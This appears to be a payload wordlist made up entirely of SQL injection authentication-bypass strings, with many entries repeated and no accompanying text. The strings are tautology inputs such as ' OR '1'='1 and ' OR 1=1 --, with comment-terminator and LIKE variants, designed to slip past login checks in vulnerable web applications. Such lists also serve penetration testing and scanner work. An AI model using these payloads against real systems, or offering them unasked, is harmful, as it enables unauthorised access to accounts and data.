' OR '1'='1
' OR '1'='1' --
' OR 1=1 --
' OR '1'='1' #
' OR '1'='1'/*
') OR ('1'='1
' OR '1'='1' --
' OR '1'='1
') OR ('1'='1
' OR 1=1 --
' OR 1=1 #
' OR 1=1/*
' OR 1=1 --
' OR 1=1 #
' OR 1=1/*
') OR 1=1 --
') OR 1=1 #
') OR 1=1/*
' OR 'a'='a
') OR ('a'='a
' OR 'a'='a' --
' OR 'a'='a' #
' OR 'a'='a'/*
' OR ''='
' OR 'x'='x
' OR 1=1 --
' OR 'x'='x
' OR x=x --
' OR x=x #
' OR x=x/*
' OR '1'='1' --
' OR '1'='1' #
' OR '1'='1'/*
' OR 1=1
' OR 1=1 --
' OR 1=1 #
' OR 1=1/*
' OR ''='
' OR ''=''
'='
' LIKE '
'=' '=
'='1
' LIKE '
' LIKE '%'
' OR ''
' OR 1=1
' OR 1=1 --
' OR 1=1 #
' OR 1=1/*
' OR ''=''
' LIKE '
' ='
' OR 1=1
' OR 1=1 --
' OR 1=1 #
' OR 1=1/*
' OR 'a'='a
' OR 'a'='a' --
' OR 'a'='a' #
' OR 'a'='a'/*
' OR ''='
' OR 1=1 --
' OR 'x'='x
' OR 'x'='x' --
' OR 'x'='x' #
' OR 'x'='x'/*
' OR 1=1
' OR 1=1 --
' OR 1=1 #
' OR 1=1/*
' OR ''='
' OR ''=''
' LIKE '
' ='
